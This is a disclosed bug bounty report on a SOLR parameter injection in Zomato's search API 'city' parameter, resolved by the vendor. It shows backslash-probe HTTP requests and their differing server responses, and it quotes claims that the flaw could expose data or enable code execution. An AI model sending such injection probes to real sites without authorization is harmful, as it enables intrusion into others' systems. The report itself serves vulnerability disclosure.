[www.zomato.com] Abusing LocalParams (city) to Inject SOLR query
Low
Vulnerability Details
## Hi Team! ;)
I Found an **limited** ``SOLR Injection`` by Abusing LocalParams (``city``) in ``/webapi/searchapi.php``, **Therefore Please respect my decision to mark this report as** ``Medium`` **instead of** ``High`` **(Based on the fact the code is Vulnerable even if it's hard to exploit).**
- Request (adding single Backslash):
```http
GET /webapi/searchapi.php?city=51\ HTTP/1.1
Host: www.zomato.com
Connection: close
Accept: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/80.0.3987.149 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en
```
- Response:
```http
HTTP/1.1 500 Internal Server Error
```
- Request (adding double Backslashes):
```http
GET /webapi/searchapi.php?city=51\\ HTTP/1.1
Host: www.zomato.com
Connection: close
Accept: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/80.0.3987.149 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en
```
- Response:
```http
HTTP/1.1 200 OK
```
**As you can see - adding single Backslash** ``\`` **will break the SOLR query but by adding double Backslashes** ``\\`` **(closing it) will execute the SOLR query properly, Therefore this isn't an "Exception" - it's a valid SOLR Injection!!**
- Source: **https://portswigger.net/research/backslash-powered-scanning-hunting-unknown-vulnerability-classes**
## Impact
**"By exploiting 'Solr (local) Parameters Injection,' it is possible to at least modify or view all the data within the Solr cluster, or even exploit known vulnerabilities to achieve remote code execution."**
- Source: **"https://www.veracode.com/blog/security-news/new-research-apache-solr-parameter-injection"**
Actions
View on HackerOneReport Stats
- Report ID: 844428
- State: Closed
- Substate: resolved
- Upvotes: 9